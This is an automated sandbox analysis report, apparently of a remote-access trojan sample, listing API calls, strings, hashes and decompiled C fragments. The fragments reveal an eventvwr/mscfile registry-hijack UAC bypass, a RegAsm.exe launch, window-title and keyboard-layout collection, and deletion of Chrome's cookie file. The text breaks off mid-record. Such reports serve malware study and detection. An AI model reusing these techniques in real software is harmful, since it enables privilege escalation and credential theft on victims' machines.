                                  • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?), ref: 0040318F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                  • exit.MSVCRT ref: 004031D8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                  Strings
                                  • open, xrefs: 004031C6
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040318A
                                  • mscfile\shell\open\command, xrefs: 0040311C
                                  • eventvwr.exe, xrefs: 004031A6
                                  • origmsc, xrefs: 00403160
                                  • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                  • API String ID: 2587331422-2529038204
                                  • Opcode ID: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                  • Opcode Fuzzy Hash: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  • open, xrefs: 0040D70B
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040D752
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                  • API String ID: 2112629403-3056885514
                                  • Opcode ID: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                  • Opcode Fuzzy Hash: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetKeyboardLayoutNameA.USER32 ref: 0040D9AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                    • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                  • String ID:
                                  • API String ID: 3751107300-0
                                  • Opcode ID: e90156051df4a0119cd1c56f39c542976f8b7538b01acf0d54b52f8ff002e118
                                  • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                  • Opcode Fuzzy Hash: e90156051df4a0119cd1c56f39c542976f8b7538b01acf0d54b52f8ff002e118
                                  • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetWindowTextW.USER32 ref: 0040EAAF
                                  • IsWindowVisible.USER32(?), ref: 0040EAB8
                                  • sprintf.MSVCRT ref: 0040EACF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                  • String ID:
                                  • API String ID: 1480451481-0
                                  • Opcode ID: 458cfa993eb2d62a5ecd06a29fbf8f583b6a8c65412ae194e4c4d661bc6b2e1f
                                  • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                  • Opcode Fuzzy Hash: 458cfa993eb2d62a5ecd06a29fbf8f583b6a8c65412ae194e4c4d661bc6b2e1f
                                  • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E004071CF() {
                                  				char _v5;
                                  				char _v6;
                                  				char _v24;
                                  				void* _v40;
                                  				char* _t12;
                                  				CHAR* _t13;
                                  				long _t20;
                                  				char* _t21;
                                  				void* _t25;
                                  
                                  				_t12 = getenv("UserProfile");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                  				_t13 =  &_v24;
                                  				L00414170();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				if(DeleteFileA(_t13) != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                  					E00407A90("\n[Chrome Cookies found, cleared!]");
                                  					_t25 = 1;
                                  					L8:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t25;
                                  				}
                                  				_t20 = GetLastError();
                                  				if(_t20 == 0) {
                                  					_t21 =  &_v6;
                                  					L5:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                  					E00407A90("\n[Chrome Cookies not found]");
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				if(_t20 == 1) {
                                  					_t21 =  &_v5;
                                  					goto L5;
                                  				}
                                  				_t25 = 0;
                                  				goto L8;
                                  			}

                                  0x004071e4
                                  0x004071ef
                                  0x004071f6
                                  0x004071fa
                                  0x00407205
                                  0x0040720e
                                  0x0040721d
                                  0x00407271
                                  0x00407277
                                  0x0040727f
                                  0x00407281
                                  0x00407284
                                  0x00000000
                                  0x0040728a
                                  0x00407226
                                  0x00407227
                                  0x0040725c
                                  0x00407238
                                  0x0040723e
                                  0x00407244
                                  0x0040724f
                                  0x00000000
                                  0x00407255
                                  0x0040722a
                                  0x00407233
                                  0x00000000
                                  0x00407236
                                  0x0040722c
                                  0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 004071E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                  • GetLastError.KERNEL32 ref: 0040721F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                  Strings
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                  • [Chrome Cookies not found], xrefs: 00407239
                                  • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                  • UserProfile, xrefs: 004071DF
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 3740952235-304995407
                                  • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                  • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E0041203B(char _a4, char _a20) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char _v68;
                                  				char _v84;
                                  				int _t18;
                                  				char* _t26;
                                  				char* _t27;
                                  				char* _t28;
                                  				char* _t29;
                                  
                                  				if( *0x41bcac != 0) {
                                  					GetLocalTime( &_v20);
                                  					_t3 =  &(_v20.wSecond); // 0x4051ef
                                  					_t26 =  &_v84;
                                  					L00414176();
                                  					_t27 =  &_v68;
                                  					L00414170();
                                  					_t28 =  &_v52;
                                  					L00414140();
                                  					_t29 =  &_v36;
                                  					L00414170();
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                  					_t18 = printf(_t29);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t18;
                                  			}

                                  0x00412048
                                  0x00412052
                                  0x0041205d
                                  0x0041207e
                                  0x00412087
                                  0x00412090
                                  0x00412094
                                  0x0041209d
                                  0x004120a1
                                  0x004120aa
                                  0x004120ae
                                  0x004120b8
                                  0x004120bf
                                  0x004120cb
                                  0x004120d4
                                  0x004120dd
                                  0x004120e6
                                  0x004120e6
                                  0x004120ef
                                  0x004120f8
                                  0x004120ff

                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00412052
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                  • printf.MSVCRT ref: 004120BF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: %02i:%02i:%02i:%03i $Q@
                                  • API String ID: 4249031962-3186260181
                                  • Opcode ID: 219c59aa8cfc69ea39da170a382ad6fcb882ddad4a02d2a278ec9a39d153be36
                                  • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
